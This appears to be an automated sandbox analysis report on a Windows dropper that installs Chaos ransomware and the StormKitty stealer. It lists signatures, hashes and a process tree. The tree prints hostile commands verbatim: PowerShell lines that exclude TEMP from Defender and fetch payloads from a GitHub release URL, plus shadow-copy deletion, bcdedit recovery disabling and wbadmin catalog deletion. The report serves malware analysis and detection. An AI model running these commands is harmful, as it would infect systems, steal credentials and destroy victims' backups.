Analysis

  • max time kernel
    106s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/03/2025, 02:34

General

  • Target

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
    "C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5516
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8211.tmp\8212.tmp\8222.bat C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
          PID:3752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4328
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4260
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1960
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1744
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3460
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                6⤵
                • Interacts with shadow copies
                PID:4064
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:6108
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1436
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:5520
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled no
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:5080
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5952
              • C:\Windows\system32\wbadmin.exe
                wbadmin delete catalog -quiet
                6⤵
                • Deletes backup catalog
                PID:4824
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
              5⤵
              • Opens file in notepad (likely ransom note)
              PID:3092
        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
          "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:4932
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:5064
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3728
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:6080
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              5⤵
              • System Location Discovery: System Language Discovery
              PID:6028
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 2456
            4⤵
            • Program crash
            PID:3044
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2988
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5460
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:5112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:844
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4932 -ip 4932
    1⤵
    PID:5900
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4628
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4584
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
    PID:4792
  • C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:4868

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

          Filesize

          1B

          MD5

          d1457b72c3fb323a2671125aef3eab5d

          SHA1

          5bab61eb53176449e25c2c82f172b82cb13ffb9d

          SHA256

          8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

          SHA512

          ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

          Filesize

          226B

          MD5

          28d7fcc2b910da5e67ebb99451a5f598

          SHA1

          a5bf77a53eda1208f4f37d09d82da0b9915a6747

          SHA256

          2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

          SHA512

          2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          b7e1db446e63a2aae76cd85440a08856

          SHA1

          c900cc81335dd3ca6337e21f5bcde80f8e8a88f3

          SHA256

          7305bcde3ba246a9b5c1666079c61596cc2ed2c651a1cd9e20557dba8a78c0e4

          SHA512

          dd63e28017eec632868489e469dd2ba54f20a3024be44550b729a0384bd55c5aa78171f7416612cd5174047afc544e21678ca164359962312b1d853c9bff04ea

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          fab4db55b120bdb8f039cbf0cbb9b699

          SHA1

          a27372a4f86a5b8e51b659dcd616514eb10ad905

          SHA256

          47480518ed97ca484d21f125901d5d123a1da236d28a1c4afd7bb052f54abcf5

          SHA512

          7ecfad64b3f9cc8a29e092d39eda8225a95e9861f83e6b1b522fb537386d4d4a8fcbd1dc9946f3075149541b225487817a60847a7e5ef18b77a4bc27145b5fa4

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          2419d068e09423d5e7edec9bb8010870

          SHA1

          445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba

          SHA256

          d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac

          SHA512

          053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

          Filesize

          81B

          MD5

          ea511fc534efd031f852fcf490b76104

          SHA1

          573e5fa397bc953df5422abbeb1a52bf94f7cf00

          SHA256

          e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

          SHA512

          f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

          Filesize

          720B

          MD5

          f1ec936a604843f00159d2d32faf0435

          SHA1

          c33fe32522a1ed0dd97f9d6da5a9e5a2965e9774

          SHA256

          bdcbff15bfd70cb1d749842819845bf9ef5e3d17559c9be900a1f1b0ed11efbd

          SHA512

          74c2c40b451ccdbb0c66900a9e5eb6189bcc29452b8649125317108375cc53f572e15a27487b05288930957c00eb96d72fd8164e98d2406bb4282f118b49cb43

        • C:\Users\Admin\AppData\Local\Temp\8211.tmp\8212.tmp\8222.bat

          Filesize

          2KB

          MD5

          1c935ef28fdfd394b770d945d7f04d76

          SHA1

          29e251c3c40ce4ad1b2984bf26b444aa045d9b21

          SHA256

          aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

          SHA512

          a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_usljgxxx.gvv.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\build.exe

          Filesize

          137KB

          MD5

          7605fb5c749eeea0b1b27fdaad78051c

          SHA1

          28388bf016af085bbcbacf8c516853942f6ec8d3

          SHA256

          466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

          SHA512

          1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

          Filesize

          211KB

          MD5

          b6054dbe4ed853c2e35291f045a632ba

          SHA1

          1355fbe1ea1f6bb566921f04512f78590c4b0e41

          SHA256

          b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

          SHA512

          648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

        • C:\Users\Admin\readme.txt

          Filesize

          780B

          MD5

          60d646f40556d78166ad8111d850fc51

          SHA1

          babaaf0762000dbf4b3f7a93beb35b6d9279d94d

          SHA256

          a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

          SHA512

          3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

        • memory/1960-48-0x0000000000BF0000-0x0000000000C18000-memory.dmp

          Filesize

          160KB

        • memory/2124-18-0x000001DD40120000-0x000001DD4033C000-memory.dmp

          Filesize

          2.1MB

        • memory/2124-19-0x00007FF8D8CB0000-0x00007FF8D9771000-memory.dmp

          Filesize

          10.8MB

        • memory/2124-3-0x00007FF8D8CB3000-0x00007FF8D8CB5000-memory.dmp

          Filesize

          8KB

        • memory/2124-13-0x000001DD40440000-0x000001DD40462000-memory.dmp

          Filesize

          136KB

        • memory/2124-14-0x00007FF8D8CB0000-0x00007FF8D9771000-memory.dmp

          Filesize

          10.8MB

        • memory/2124-15-0x00007FF8D8CB0000-0x00007FF8D9771000-memory.dmp

          Filesize

          10.8MB

        • memory/4932-70-0x0000000006940000-0x00000000069D2000-memory.dmp

          Filesize

          584KB

        • memory/4932-68-0x0000000005CD0000-0x00000000061FC000-memory.dmp

          Filesize

          5.2MB

        • memory/4932-69-0x0000000006830000-0x0000000006896000-memory.dmp

          Filesize

          408KB

        • memory/4932-67-0x0000000004D80000-0x0000000004F42000-memory.dmp

          Filesize

          1.8MB

        • memory/4932-64-0x0000000004B90000-0x0000000004BA2000-memory.dmp

          Filesize

          72KB

        • memory/4932-62-0x0000000000240000-0x000000000027C000-memory.dmp

          Filesize

          240KB

        • memory/5516-0-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB

        • memory/5516-66-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB